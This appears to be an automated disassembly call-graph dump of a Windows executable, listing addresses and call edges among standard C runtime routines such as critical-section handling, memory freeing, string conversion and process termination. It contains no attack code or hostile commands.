5300 9c5990 _ValidateLocalCookies 5298->5300 5299->5300 5300->5231 5344 9c426e 5301->5344 5452 9c6b14 5306->5452 5309 9c3f35 5311 9c3f3e IsProcessorFeaturePresent 5309->5311 5312 9c3f5c 5309->5312 5314 9c3f49 5311->5314 5313 9c3793 _abort 23 API calls 5312->5313 5316 9c3f66 5313->5316 5480 9c4573 5314->5480 5318 9c576d 5317->5318 5319 9c5771 _abort 5317->5319 5318->5319 5321 9c5791 5318->5321 5323 9c57dd 5318->5323 5319->5286 5321->5319 5322 9c579d GetProcAddress 5321->5322 5322->5319 5324 9c57fe LoadLibraryExW 5323->5324 5325 9c57f3 5323->5325 5326 9c581b GetLastError 5324->5326 5327 9c5833 5324->5327 5325->5318 5326->5327 5328 9c5826 LoadLibraryExW 5326->5328 5327->5325 5329 9c584a FreeLibrary 5327->5329 5328->5327 5329->5325 5333 9c69d6 5330->5333 5332 9c69a8 _ValidateLocalCookies 5332->5290 5334 9c69e2 ___scrt_is_nonwritable_in_current_image 5333->5334 5339 9c56e2 EnterCriticalSection 5334->5339 5336 9c69ed 5340 9c6a1f 5336->5340 5338 9c6a14 _abort 5338->5332 5339->5336 5343 9c572a LeaveCriticalSection 5340->5343 5342 9c6a26 5342->5338 5343->5342 5350 9c41ae 5344->5350 5346 9c4292 5347 9c421e 5346->5347 5361 9c40b2 5347->5361 5349 9c4242 5349->5239 5351 9c41ba ___scrt_is_nonwritable_in_current_image 5350->5351 5356 9c56e2 EnterCriticalSection 5351->5356 5353 9c41c4 5357 9c41ea 5353->5357 5355 9c41e2 _abort 5355->5346 5356->5353 5360 9c572a LeaveCriticalSection 5357->5360 5359 9c41f4 5359->5355 5360->5359 5362 9c40be ___scrt_is_nonwritable_in_current_image 5361->5362 5369 9c56e2 EnterCriticalSection 5362->5369 5364 9c40c8 5370 9c43d9 5364->5370 5366 9c40e0 5374 9c40f6 5366->5374 5368 9c40ee _abort 5368->5349 5369->5364 5371 9c43e8 __fassign 5370->5371 5373 9c440f __fassign 5370->5373 5371->5373 5377 9c6507 5371->5377 5373->5366 5451 9c572a LeaveCriticalSection 5374->5451 5376 9c4100 5376->5368 5379 9c6587 5377->5379 5380 9c651d 5377->5380 5381 9c4869 _free 15 API calls 5379->5381 5403 9c65d5 5379->5403 5380->5379 5385 9c4869 _free 15 API calls 5380->5385 5387 
9c6550 5380->5387 5382 9c65a9 5381->5382 5383 9c4869 _free 15 API calls 5382->5383 5388 9c65bc 5383->5388 5384 9c4869 _free 15 API calls 5389 9c657c 5384->5389 5391 9c6545 5385->5391 5386 9c65e3 5390 9c6643 5386->5390 5404 9c4869 15 API calls _free 5386->5404 5392 9c4869 _free 15 API calls 5387->5392 5402 9c6572 5387->5402 5393 9c4869 _free 15 API calls 5388->5393 5394 9c4869 _free 15 API calls 5389->5394 5395 9c4869 _free 15 API calls 5390->5395 5405 9c6078 5391->5405 5397 9c6567 5392->5397 5398 9c65ca 5393->5398 5394->5379 5399 9c6649 5395->5399 5433 9c6176 5397->5433 5401 9c4869 _free 15 API calls 5398->5401 5399->5373 5401->5403 5402->5384 5445 9c667a 5403->5445 5404->5386 5407 9c6089 5405->5407 5432 9c6172 5405->5432 5406 9c609a 5409 9c60ac 5406->5409 5410 9c4869 _free 15 API calls 5406->5410 5407->5406 5408 9c4869 _free 15 API calls 5407->5408 5408->5406 5411 9c60be 5409->5411 5413 9c4869 _free 15 API calls 5409->5413 5410->5409 5412 9c60d0 5411->5412 5414 9c4869 _free 15 API calls 5411->5414 5415 9c60e2 5412->5415 5416 9c4869 _free 15 API calls 5412->5416 5413->5411 5414->5412 5417 9c60f4 5415->5417 5418 9c4869 _free 15 API calls 5415->5418 5416->5415 5419 9c6106 5417->5419 5421 9c4869 _free 15 API calls 5417->5421 5418->5417 5420 9c6118 5419->5420 5422 9c4869 _free 15 API calls 5419->5422 5423 9c612a 5420->5423 5424 9c4869 _free 15 API calls 5420->5424 5421->5419 5422->5420 5425 9c613c 5423->5425 5426 9c4869 _free 15 API calls 5423->5426 5424->5423 5427 9c614e 5425->5427 5429 9c4869 _free 15 API calls 5425->5429 5426->5425 5428 9c6160 5427->5428 5430 9c4869 _free 15 API calls 5427->5430 5431 9c4869 _free 15 API calls 5428->5431 5428->5432 5429->5427 5430->5428 5431->5432 5432->5387 5434 9c6183 5433->5434 5444 9c61db 5433->5444 5435 9c6193 5434->5435 5437 9c4869 _free 15 API calls 5434->5437 5436 9c61a5 5435->5436 5438 9c4869 _free 15 API calls 5435->5438 5439 9c61b7 5436->5439 5440 9c4869 _free 15 API calls 5436->5440 5437->5435 5438->5436 5441 9c4869 _free 
15 API calls 5439->5441 5442 9c61c9 5439->5442 5440->5439 5441->5442 5443 9c4869 _free 15 API calls 5442->5443 5442->5444 5443->5444 5444->5402 5446 9c6687 5445->5446 5450 9c66a5 5445->5450 5447 9c621b __fassign 15 API calls 5446->5447 5446->5450 5448 9c669f 5447->5448 5449 9c4869 _free 15 API calls 5448->5449 5449->5450 5450->5386 5451->5376 5484 9c6a82 5452->5484 5455 9c6b6f 5456 9c6b7b _abort 5455->5456 5460 9c6ba8 _abort 5456->5460 5462 9c6ba2 _abort 5456->5462 5498 9c44a8 GetLastError 5456->5498 5458 9c6bf4 5459 9c47f9 __dosmaperr 15 API calls 5458->5459 5461 9c6bf9 5459->5461 5466 9c6c20 5460->5466 5520 9c56e2 EnterCriticalSection 5460->5520 5517 9c473d 5461->5517 5462->5458 5462->5460 5465 9c6bd7 _abort 5462->5465 5465->5309 5467 9c6c7f 5466->5467 5469 9c6c77 5466->5469 5478 9c6caa 5466->5478 5521 9c572a LeaveCriticalSection 5466->5521 5467->5478 5522 9c6b66 5467->5522 5472 9c3793 _abort 23 API calls 5469->5472 5472->5467 5474 9c4424 _abort 33 API calls 5476 9c6d0d 5474->5476 5476->5465 5479 9c4424 _abort 33 API calls 5476->5479 5477 9c6b66 _abort 33 API calls 5477->5478 5525 9c6d2f 5478->5525 5479->5465 5481 9c458f _abort 5480->5481 5482 9c45bb IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 5481->5482 5483 9c468c _abort _ValidateLocalCookies 5482->5483 5483->5312 5487 9c6a28 5484->5487 5486 9c3f29 5486->5309 5486->5455 5488 9c6a34 ___scrt_is_nonwritable_in_current_image 5487->5488 5493 9c56e2 EnterCriticalSection 5488->5493 5490 9c6a42 5494 9c6a76 5490->5494 5492 9c6a69 _abort 5492->5486 5493->5490 5497 9c572a LeaveCriticalSection 5494->5497 5496 9c6a80 5496->5492 5497->5496 5499 9c44c7 5498->5499 5500 9c44c1 5498->5500 5502 9c480c _abort 12 API calls 5499->5502 5504 9c451e SetLastError 5499->5504 5501 9c5904 _abort 6 API calls 5500->5501 5501->5499 5503 9c44d9 5502->5503 5505 9c44e1 5503->5505 5507 9c595a _abort 6 API calls 5503->5507 5506 9c4527 5504->5506 5508 9c4869 _free 12 API calls 5505->5508 5506->5462 5509 9c44f6 5507->5509 
5511 9c44e7 5508->5511 5509->5505 5510 9c44fd 5509->5510 5512 9c4296 _abort 12 API calls 5510->5512 5513 9c4515 SetLastError 5511->5513 5514 9c4508 5512->5514 5513->5506 5515 9c4869 _free 12 API calls 5514->5515 5516 9c450e 5515->5516 5516->5504 5516->5513 5529 9c46c2 5517->5529 5519 9c4749 5519->5465 5520->5466 5521->5469 5523 9c4424 _abort 33 API calls 5522->5523 5524 9c6b6b 5523->5524 5524->5477 5526 9c6cfe 5525->5526 5527 9c6d35 5525->5527 5526->5465 5526->5474 5526->5476 5541 9c572a LeaveCriticalSection 5527->5541 5530 9c44a8 __dosmaperr 15 API calls 5529->5530 5531 9c46d8 5530->5531 5536 9c46e6 _ValidateLocalCookies 5531->5536 5537 9c474d IsProcessorFeaturePresent 5531->5537 5533 9c473c 5534 9c46c2 _abort 21 API calls 5533->5534 5535 9c4749 5534->5535 5535->5519 5536->5519 5538 9c4758 5537->5538 5539 9c4573 _abort 3 API calls 5538->5539 5540 9c476d GetCurrentProcess TerminateProcess 5539->5540 5540->5533 5541->5526 5542->5244 5546 9c572a LeaveCriticalSection 5543->5546 5545 9c52e1 5545->5244 5546->5545 5548 9c3f8f 5547->5548 5549 9c3f85 5547->5549 5548->5549 5550 9c4424 _abort 33 API calls 5548->5550 5549->5253 5549->5254 5551 9c3fb0 5550->5551 5555 9c72d1 5551->5555 5556 9c3fc9 5555->5556 5557 9c72e4 5555->5557 5559 9c72fe 5556->5559 5557->5556 5563 9c6754 5557->5563 5560 9c7326 5559->5560 5561 9c7311 5559->5561 5560->5549 5561->5560 5562 9c5249 __fassign 33 API calls 5561->5562 5562->5560 5564 9c6760 ___scrt_is_nonwritable_in_current_image 5563->5564 5565 9c4424 _abort 33 API calls 5564->5565 5566 9c6769 5565->5566 5567 9c67b7 _abort 5566->5567 5575 9c56e2 EnterCriticalSection 5566->5575 5567->5556 5569 9c6787 5576 9c67cb 5569->5576 5574 9c3f24 _abort 33 API calls 5574->5567 5575->5569 5577 9c679b 5576->5577 5578 9c67d9 __fassign 5576->5578 5580 9c67ba 5577->5580 5578->5577 5579 9c6507 __fassign 15 API calls 5578->5579 5579->5577 5583 9c572a LeaveCriticalSection 5580->5583 5582 9c67ae 5582->5567 5582->5574 5583->5582 5585 9c4fd0 5584->5585 5591 9c507a 
_ValidateLocalCookies 5584->5591 5592 9c634d 5585->5592 5587 9c5031 5604 9c7cd1 5587->5604 5590 9c7cd1 38 API calls 5590->5591 5591->5269 5593 9c3f72 __fassign 33 API calls 5592->5593 5594 9c636d MultiByteToWideChar 5593->5594 5597 9c63ab 5594->5597 5600 9c6443 _ValidateLocalCookies 5594->5600 5596 9c63cc _abort __alloca_probe_16 5598 9c643d 5596->5598 5602 9c6411 MultiByteToWideChar 5596->5602 5597->5596 5599 9c62ff 16 API calls 5597->5599 5609 9c646a 5598->5609 5599->5596 5600->5587 5602->5598 5603 9c642d GetStringTypeW 5602->5603 5603->5598 5605 9c3f72 __fassign 33 API calls 5604->5605 5606 9c7ce4 5605->5606 5613 9c7ab4 5606->5613 5608 9c5052 5608->5590 5610 9c6487 5609->5610 5611 9c6476 5609->5611 5610->5600 5611->5610 5612 9c4869 _free 15 API calls 5611->5612 5612->5610 5614 9c7acf 5613->5614 5615 9c7af5 MultiByteToWideChar 5614->5615 5616 9c7ca9 _ValidateLocalCookies 5615->5616 5617 9c7b1f 5615->5617 5616->5608 5618 9c62ff 16 API calls 5617->5618 5621 9c7b40 __alloca_probe_16 5617->5621 5618->5621 5619 9c7b89 MultiByteToWideChar 5620 9c7bf5 5619->5620 5622 9c7ba2 5619->5622 5623 9c646a __freea 15 API calls 5620->5623 5621->5619 5621->5620 5638 9c5a15 5622->5638 5623->5616 5625 9c7bb9 5625->5620 5626 9c7bcc 5625->5626 5627 9c7c04 5625->5627 5626->5620 5628 9c5a15 6 API calls 5626->5628 5630 9c62ff 16 API calls 5627->5630 5631 9c7c25 __alloca_probe_16 5627->5631 5628->5620 5629 9c7c9a 5633 9c646a __freea 15 API calls 5629->5633 5630->5631 5631->5629 5632 9c5a15 6 API calls 5631->5632 5634 9c7c79 5632->5634 5633->5620 5634->5629 5635 9c7c88 WideCharToMultiByte 5634->5635 5635->5629 5636 9c7cc8 5635->5636 5637 9c646a __freea 15 API calls 5636->5637 5637->5620 5639 9c5741 _abort 5 API calls 5638->5639 5640 9c5a3c 5639->5640 5641 9c5a45 _ValidateLocalCookies 5640->5641 5644 9c5a9d 5640->5644 5641->5625 5643 9c5a85 LCMapStringW 5643->5641 5645 9c5741 _abort 5 API calls 5644->5645 5646 9c5ac4 _ValidateLocalCookies 5645->5646 5646->5643 5648 9c4d5d 
___scrt_is_nonwritable_in_current_image 5647->5648 5655 9c56e2 EnterCriticalSection 5648->5655 5650 9c4d67 5656 9c4dbc 5650->5656 5654 9c4d80 _abort 5654->5283 5655->5650 5668 9c54dc 5656->5668 5658 9c4e0a 5659 9c54dc 21 API calls 5658->5659 5660 9c4e26 5659->5660 5661 9c54dc 21 API calls 5660->5661 5662 9c4e44 5661->5662 5663 9c4d74 5662->5663 5664 9c4869 _free 15 API calls 5662->5664 5665 9c4d88 5663->5665 5664->5663 5682 9c572a LeaveCriticalSection 5665->5682 5667 9c4d92 5667->5654 5669 9c54ed 5668->5669 5673 9c54e9 5668->5673 5670 9c54f4 5669->5670 5675 9c5507 _abort 5669->5675 5671 9c47f9 __dosmaperr 15 API calls 5670->5671 5672 9c54f9 5671->5672 5674 9c473d _abort 21 API calls 5672->5674 5673->5658 5674->5673 5675->5673 5676 9c5535 5675->5676 5677 9c553e 5675->5677 5678 9c47f9 __dosmaperr 15 API calls 5676->5678 5677->5673 5680 9c47f9 __dosmaperr 15 API calls 5677->5680 5679 9c553a 5678->5679 5681 9c473d _abort 21 API calls 5679->5681 5680->5679 5681->5673 5682->5667 5684 9c3f72 __fassign 33 API calls 5683->5684 5685 9c5571 5684->5685 5685->5074 5687 9c356a _abort 5686->5687 5694 9c3582 5687->5694 5701 9c36b8 GetModuleHandleW 5687->5701 5690 9c358a 5699 9c35ff _abort 5690->5699 5709 9c3c97 5690->5709 5708 9c56e2 EnterCriticalSection 5694->5708 5696 9c3671 _abort 5696->5107 5712 9c3668 5699->5712 5702 9c3576 5701->5702 5702->5694 5703 9c36fc GetModuleHandleExW 5702->5703 5704 9c3726 GetProcAddress 5703->5704 5706 9c373b 5703->5706 5704->5706 5705 9c374f FreeLibrary 5707 9c3758 _ValidateLocalCookies 5705->5707 5706->5705 5706->5707 5707->5694 5708->5690 5723 9c39d0 5709->5723 5743 9c572a LeaveCriticalSection 5712->5743 5714 9c3641 5714->5696 5715 9c3677 5714->5715 5744 9c5b1f 5715->5744 5717 9c3681 5718 9c36a5 5717->5718 5719 9c3685 GetPEB 5717->5719 5721 9c36fc _abort 3 API calls 5718->5721 5719->5718 5720 9c3695 GetCurrentProcess TerminateProcess 5719->5720 5720->5718 5722 9c36ad ExitProcess 5721->5722 5726 9c397f 5723->5726 5725 9c39f4 5725->5699 5727 9c398b 
___scrt_is_nonwritable_in_current_image 5726->5727 5734 9c56e2 EnterCriticalSection 5727->5734 5729 9c3999 5735 9c3a20 5729->5735 5731 9c39a6 5739 9c39c4 5731->5739 5733 9c39b7 _abort 5733->5725 5734->5729 5736 9c3a40 _ValidateLocalCookies 5735->5736 5737 9c3a48 5735->5737 5736->5731 5737->5736 5738 9c4869 _free 15 API calls 5737->5738 5738->5736 5742 9c572a LeaveCriticalSection 5739->5742 5741 9c39ce 5741->5733 5742->5741 5743->5714 5745 9c5b44 5744->5745 5747 9c5b3a _ValidateLocalCookies 5744->5747 5746 9c5741 _abort 5 API calls 5745->5746 5746->5747 5747->5717 6634 9c324d 6635 9c522b 46 API calls 6634->6635 6636 9c325f 6635->6636 6645 9c561e GetEnvironmentStringsW 6636->6645 6639 9c326a 6641 9c4869 _free 15 API calls 6639->6641 6642 9c329f 6641->6642 6643 9c4869 _free 15 API calls 6643->6639 6644 9c3275 6644->6643 6646 9c5635 6645->6646 6656 9c5688 6645->6656 6647 9c563b WideCharToMultiByte 6646->6647 6650 9c5657 6647->6650 6647->6656 6648 9c3264 6648->6639 6657 9c32a5 6648->6657 6649 9c5691 FreeEnvironmentStringsW 6649->6648 6651 9c62ff 16 API calls 6650->6651 6652 9c565d 6651->6652 6653 9c5664 WideCharToMultiByte 6652->6653 6654 9c567a 6652->6654 6653->6654 6655 9c4869 _free 15 API calls 6654->6655 6655->6656 6656->6648 6656->6649 6658 9c32ba 6657->6658 6659 9c480c _abort 15 API calls 6658->6659 6664 9c32e1 6659->6664 6660 9c4869 _free 15 API calls 6662 9c335f 6660->6662 6661 9c3345 6661->6660 6662->6644 6663 9c480c _abort 15 API calls 6663->6664 6664->6661 6664->6663 6665 9c3347 6664->6665 6669 9c3369 6664->6669 6672 9c4869 _free 15 API calls 6664->6672 6674 9c3eca 6664->6674 6667 9c3376 15 API calls 6665->6667 6668 9c334d 6667->6668 6670 9c4869 _free 15 API calls 6668->6670 6671 9c474d _abort 6 API calls 6669->6671 6670->6661 6673 9c3375 6671->6673 6672->6664 6675 9c3ee5 6674->6675 6676 9c3ed7 6674->6676 6677 9c47f9 __dosmaperr 15 API calls 6675->6677 6676->6675 6681 9c3efc 6676->6681 6678 9c3eed 6677->6678 6679 9c473d _abort 21 API calls 6678->6679 6680 
9c3ef7 6679->6680 6680->6664 6681->6680 6682 9c47f9 __dosmaperr 15 API calls 6681->6682 6682->6678 6000 9c55ce GetCommandLineA GetCommandLineW 5749 9c3d8f 5750 9c3d9e 5749->5750 5754 9c3db2 5749->5754 5752 9c4869 _free 15 API calls 5750->5752 5750->5754 5751 9c4869 _free 15 API calls 5753 9c3dc4 5751->5753 5752->5754 5755 9c4869 _free 15 API calls 5753->5755 5754->5751 5756 9c3dd7 5755->5756 5757 9c4869 _free 15 API calls 5756->5757 5758 9c3de8 5757->5758 5759 9c4869 _free 15 API calls 5758->5759 5760 9c3df9 5759->5760 6465 9c430f 6466 9c432a 6465->6466 6467 9c431a 6465->6467 6471 9c4330 6467->6471 6470 9c4869 _free 15 API calls 6470->6466 6472 9c4349 6471->6472 6473 9c4343 6471->6473 6475 9c4869 _free 15 API calls 6472->6475 6474 9c4869 _free 15 API calls 6473->6474 6474->6472 6476 9c4355 6475->6476 6477 9c4869 _free 15 API calls 6476->6477 6478 9c4360 6477->6478 6479 9c4869 _free 15 API calls 6478->6479 6480 9c436b 6479->6480 6481 9c4869 _free 15 API calls 6480->6481 6482 9c4376 6481->6482 6483 9c4869 _free 15 API calls 6482->6483 6484 9c4381 6483->6484 6485 9c4869 _free 15 API calls 6484->6485 6486 9c438c 6485->6486 6487 9c4869 _free 15 API calls 6486->6487 6488 9c4397 6487->6488 6489 9c4869 _free 15 API calls 6488->6489 6490 9c43a2 6489->6490 6491 9c4869 _free 15 API calls 6490->6491 6492 9c43b0 6491->6492 6497 9c41f6 6492->6497 6503 9c4102 6497->6503 6499 9c421a 6500 9c4246 6499->6500 6516 9c4163 6500->6516 6502 9c426a 6502->6470 6504 9c410e ___scrt_is_nonwritable_in_current_image 6503->6504 6511 9c56e2 EnterCriticalSection 6504->6511 6506 9c4142 6512 9c4157 6506->6512 6508 9c4118 6508->6506 6510 9c4869 _free 15 API calls 6508->6510 6509 9c414f _abort 6509->6499 6510->6506 6511->6508 6515 9c572a LeaveCriticalSection 6512->6515 6514 9c4161 6514->6509 6515->6514 6517 9c416f ___scrt_is_nonwritable_in_current_image 6516->6517 6524 9c56e2 EnterCriticalSection 6517->6524 6519 9c4179 6520 9c43d9 _abort 15 API calls 6519->6520 6521 9c418c 6520->6521 6525 9c41a2 
6521->6525 6523 9c419a _abort 6523->6502 6524->6519 6528 9c572a LeaveCriticalSection 6525->6528 6527 9c41ac 6527->6523 6528->6527 6683 9c1248 6684 9c1250 6683->6684 6700 9c37f7 6684->6700 6686 9c125b 6707 9c1664 6686->6707 6688 9c12cd 6689 9c191f 4 API calls 6688->6689 6699 9c12ea 6688->6699 6691 9c12f2 6689->6691 6690 9c1270 __RTC_Initialize 6690->6688 6713 9c17f1 6690->6713 6693 9c1289 6693->6688 6716 9c18ab InitializeSListHead 6693->6716 6695 9c129f 6717 9c18ba 6695->6717 6697 9c12c2 6723 9c3891 6697->6723 6701 9c3829 6700->6701 6702 9c3806 6700->6702 6701->6686 6702->6701 6703 9c47f9 __dosmaperr 15 API calls 6702->6703 6704 9c3819 6703->6704 6705 9c473d _abort 21 API calls 6704->6705 6706 9c3824 6705->6706 6706->6686 6708 9c1674 6707->6708 6709 9c1670 6707->6709 6710 9c1681 ___scrt_release_startup_lock 6708->6710 6711 9c191f 4 API calls 6708->6711 6709->6690 6710->6690 6712 9c16ea 6711->6712 6730 9c17c4 6713->6730 6716->6695 6768 9c3e2a 6717->6768 6719 9c18cb 6720 9c18d2 6719->6720 6721 9c191f 4 API calls 6719->6721 6720->6697 6722 9c18da 6721->6722 6722->6697 6724 9c4424 _abort 33 API calls 6723->6724 6725 9c389c 6724->6725 6726 9c38d4 6725->6726 6727 9c47f9 __dosmaperr 15 API calls 6725->6727 6726->6688 6728 9c38c9 6727->6728 6729 9c473d _abort 21 API calls 6728->6729 6729->6726 6731 9c17da 6730->6731 6732 9c17d3 6730->6732 6739 9c3cf1 6731->6739 6736 9c3c81 6732->6736 6735 9c17d8 6735->6693 6737 9c3cf1 24 API calls 6736->6737 6738 9c3c93 6737->6738 6738->6735 6742 9c39f8 6739->6742 6745 9c392e 6742->6745 6744 9c3a1c 6744->6735 6746 9c393a ___scrt_is_nonwritable_in_current_image 6745->6746 6753 9c56e2 EnterCriticalSection 6746->6753 6748 9c3948 6754 9c3b40 6748->6754 6750 9c3955 6764 9c3973 6750->6764 6752 9c3966 _abort 6752->6744 6753->6748 6755 9c3b5e 6754->6755 6756 9c3b56 _abort 6754->6756 6755->6756 6757 9c3bb7 6755->6757 6758 9c681b 24 API calls 6755->6758 6756->6750 6757->6756 6759 9c681b 24 API calls 6757->6759 6760 9c3bad 6758->6760 6761 9c3bcd 
6759->6761 6762 9c4869 _free 15 API calls 6760->6762 6763 9c4869 _free 15 API calls 6761->6763 6762->6757 6763->6756 6767 9c572a LeaveCriticalSection 6764->6767 6766 9c397d 6766->6752 6767->6766 6769 9c3e48 6768->6769 6772 9c3e68 6768->6772 6770 9c47f9 __dosmaperr 15 API calls 6769->6770 6771 9c3e5e 6770->6771 6773 9c473d _abort 21 API calls 6771->6773 6772->6719 6773->6772 5761 9c1489 5764 9c1853 5761->5764 5763 9c148e 5763->5763 5765 9c1869 5764->5765 5766 9c1872 5765->5766 5768 9c1806 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 5765->5768 5766->5763 5768->5766 5769 9c4c8a 5774 9c4cbf 5769->5774 5772 9c4869 _free 15 API calls 5773 9c4ca6 5772->5773 5775 9c4cd1 5774->5775 5784 9c4c98 5774->5784 5776 9c4cd6 5775->5776 5777 9c4d01 5775->5777 5778 9c480c _abort 15 API calls 5776->5778 5777->5784 5785 9c681b 5777->5785 5779 9c4cdf 5778->5779 5781 9c4869 _free 15 API calls 5779->5781 5781->5784 5782 9c4d1c 5783 9c4869 _free 15 API calls 5782->5783 5783->5784 5784->5772 5784->5773 5786 9c6826 5785->5786 5787 9c684e 5786->5787 5788 9c683f 5786->5788 5789 9c685d 5787->5789 5794 9c7e13 5787->5794 5790 9c47f9 __dosmaperr 15 API calls 5788->5790 5801 9c7e46 5789->5801 5792 9c6844 _abort 5790->5792 5792->5782 5795 9c7e1e 5794->5795 5796 9c7e33 HeapSize 5794->5796 5797 9c47f9 __dosmaperr 15 API calls 5795->5797 5796->5789 5798 9c7e23 5797->5798 5799 9c473d _abort 21 API calls 5798->5799 5800 9c7e2e 5799->5800 5800->5789 5802 9c7e5e 5801->5802 5803 9c7e53 5801->5803 5805 9c7e66 5802->5805 5811 9c7e6f _abort 5802->5811 5804 9c62ff 16 API calls 5803->5804 5809 9c7e5b 5804->5809 5806 9c4869 _free 15 API calls 5805->5806 5806->5809 5807 9c7e99 HeapReAlloc 5807->5809 5807->5811 5808 9c7e74 5810 9c47f9 __dosmaperr 15 API calls 5808->5810 5809->5792 5810->5809 5811->5807 5811->5808 5812 9c6992 _abort 2 API calls 5811->5812 5812->5811 6001 9c98c5 6002 9c98ed 6001->6002 6003 9c9925 6002->6003 6004 9c991e 6002->6004 6005 9c9917 6002->6005 6014 
9c9980 6004->6014 6010 9c9997 6005->6010 6011 9c99a0 6010->6011 6018 9ca06f 6011->6018 6013 9c991c 6015 9c99a0 6014->6015 6016 9ca06f __startOneArgErrorHandling 16 API calls 6015->6016 6017 9c9923 6016->6017 6019 9ca0ae __startOneArgErrorHandling 6018->6019 6022 9ca130 __startOneArgErrorHandling 6019->6022 6024 9ca472 6019->6024 6023 9ca166 _ValidateLocalCookies 6022->6023 6027 9ca786 6022->6027 6023->6013 6034 9ca495 6024->6034 6028 9ca7a8 6027->6028 6029 9ca793 6027->6029 6030 9c47f9 __dosmaperr 15 API calls 6028->6030 6031 9ca7ad 6029->6031 6032 9c47f9 __dosmaperr 15 API calls 6029->6032 6030->6031 6031->6023 6033 9ca7a0 6032->6033 6033->6023 6035 9ca4c0 __raise_exc 6034->6035 6036 9ca6b9 RaiseException 6035->6036 6037 9ca490 6036->6037 6037->6022 5813 9c3d86 5814 9c1f7d ___scrt_uninitialize_crt 7 API calls 5813->5814 5815 9c3d8d 5814->5815 6774 9c9146 IsProcessorFeaturePresent 6529 9c3400 6530 9c3418 6529->6530 6531 9c3412 6529->6531 6532 9c3376 15 API calls 6531->6532 6532->6530 6533 9c1e00 6537 9c1e1e ___except_validate_context_record _ValidateLocalCookies __IsNonwritableInCurrentImage 6533->6537 6534 9c1e9e _ValidateLocalCookies 6536 9c1f27 _ValidateLocalCookies 6537->6534 6538 9c2340 RtlUnwind 6537->6538 6538->6536 6775 9c3d41 6778 9c341b 6775->6778 6779 9c342a 6778->6779 6780 9c3376 15 API calls 6779->6780 6781 9c3444 6780->6781 6782 9c3376 15 API calls 6781->6782 6783 9c344f 6782->6783 6784 9c1442 6785 9c1a6a GetModuleHandleW 6784->6785 6786 9c144a 6785->6786 6787 9c144e 6786->6787 6788 9c1480 6786->6788 6791 9c1459 6787->6791 6793 9c3775 6787->6793 6789 9c3793 _abort 23 API calls 6788->6789 6792 9c1488 6789->6792 6794 9c355e _abort 23 API calls 6793->6794 6795 9c3780 6794->6795 6795->6791 6038 9c9ec3 6039 9c9ecd 6038->6039 6040 9c9ed9 6038->6040 6039->6040 6041 9c9ed2 CloseHandle 6039->6041 6041->6040 6539 9c383f 6540 9c384b ___scrt_is_nonwritable_in_current_image 6539->6540 6541 9c3882 _abort 6540->6541 6547 9c56e2 EnterCriticalSection 6540->6547 6543 
9c385f 6544 9c67cb __fassign 15 API calls 6543->6544 6545 9c386f 6544->6545 6548 9c3888 6545->6548 6547->6543 6551 9c572a LeaveCriticalSection 6548->6551 6550 9c388f 6550->6541 6551->6550 5816 9c1ab8 5817 9c1aef 5816->5817 5820 9c1aca 5816->5820 5820->5817 5825 9c209a 5820->5825 5837 9c23c3 5825->5837 5828 9c20a3 5829 9c23c3 43 API calls 5828->5829 5830 9c1b06 5829->5830 5831 9c3e89 5830->5831 5832 9c3e95 _abort 5831->5832 5833 9c4424 _abort 33 API calls 5832->5833 5835 9c3e9a 5833->5835 5834 9c3f24 _abort 33 API calls 5836 9c3ec4 5834->5836 5835->5834 5851 9c23d1 5837->5851 5839 9c23c8 5840 9c1afc 5839->5840 5841 9c6b14 _abort 2 API calls 5839->5841 5840->5828 5842 9c3f29 5841->5842 5843 9c3f35 5842->5843 5844 9c6b6f _abort 33 API calls 5842->5844 5845 9c3f3e IsProcessorFeaturePresent 5843->5845 5846 9c3f5c 5843->5846 5844->5843 5848 9c3f49 5845->5848 5847 9c3793 _abort 23 API calls 5846->5847 5850 9c3f66 5847->5850 5849 9c4573 _abort 3 API calls 5848->5849 5849->5846 5852 9c23dd GetLastError 5851->5852 5853 9c23da 5851->5853 5863 9c26a4 5852->5863 5853->5839 5856 9c2457 SetLastError 5856->5839 5857 9c26df ___vcrt_FlsSetValue 6 API calls 5858 9c240b 5857->5858 5859 9c2433 5858->5859 5860 9c26df ___vcrt_FlsSetValue 6 API calls 5858->5860 5862 9c2411 5858->5862 5861 9c26df ___vcrt_FlsSetValue 6 API calls 5859->5861 5859->5862 5860->5859 5861->5862 5862->5856 5864 9c2543 ___vcrt_InitializeCriticalSectionEx 5 API calls 5863->5864 5865 9c26be 5864->5865 5866 9c26d6 TlsGetValue 5865->5866 5867 9c23f2 5865->5867 5866->5867 5867->5856 5867->5857 5867->5862 5868 9c48bb 5869 9c48cb 5868->5869 5878 9c48e1 5868->5878 5870 9c47f9 __dosmaperr 15 API calls 5869->5870 5871 9c48d0 5870->5871 5873 9c473d _abort 21 API calls 5871->5873 5874 9c48da 5873->5874 5875 9c494b 5875->5875 5898 9c31ec 5875->5898 5877 9c49b9 5880 9c4869 _free 15 API calls 5877->5880 5878->5875 5881 9c4a2c 5878->5881 5887 9c4a4b 5878->5887 5879 9c49b0 5879->5877 5884 9c4a3e 5879->5884 5904 9c79bb 5879->5904 
5880->5881 5913 9c4c65 5881->5913 5885 9c474d _abort 6 API calls 5884->5885 5886 9c4a4a 5885->5886 5888 9c4a57 5887->5888 5888->5888 5889 9c480c _abort 15 API calls 5888->5889 5890 9c4a85 5889->5890 5891 9c79bb 21 API calls 5890->5891 5892 9c4ab1 5891->5892 5893 9c474d _abort 6 API calls 5892->5893 5894 9c4ae0 _abort 5893->5894 5895 9c4b81 FindFirstFileExA 5894->5895 5896 9c4bd0 5895->5896 5897 9c4a4b 21 API calls 5896->5897 5899 9c3201 5898->5899 5900 9c31fd 5898->5900 5899->5900 5901 9c480c _abort 15 API calls 5899->5901 5900->5879 5902 9c322f 5901->5902 5903 9c4869 _free 15 API calls 5902->5903 5903->5900 5908 9c790a 5904->5908 5905 9c791f 5906 9c47f9 __dosmaperr 15 API calls 5905->5906 5907 9c7924 5905->5907 5909 9c794a 5906->5909 5907->5879 5908->5905 5908->5907 5911 9c795b 5908->5911 5910 9c473d _abort 21 API calls 5909->5910 5910->5907 5911->5907 5912 9c47f9 __dosmaperr 15 API calls 5911->5912 5912->5909 5914 9c4c6f 5913->5914 5915 9c4c7f 5914->5915 5916 9c4869 _free 15 API calls 5914->5916 5917 9c4869 _free 15 API calls 5915->5917 5916->5914 5918 9c4c86 5917->5918 5918->5874 5919 9c14bb IsProcessorFeaturePresent 5920 9c14d0 5919->5920 5923 9c1493 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 5920->5923 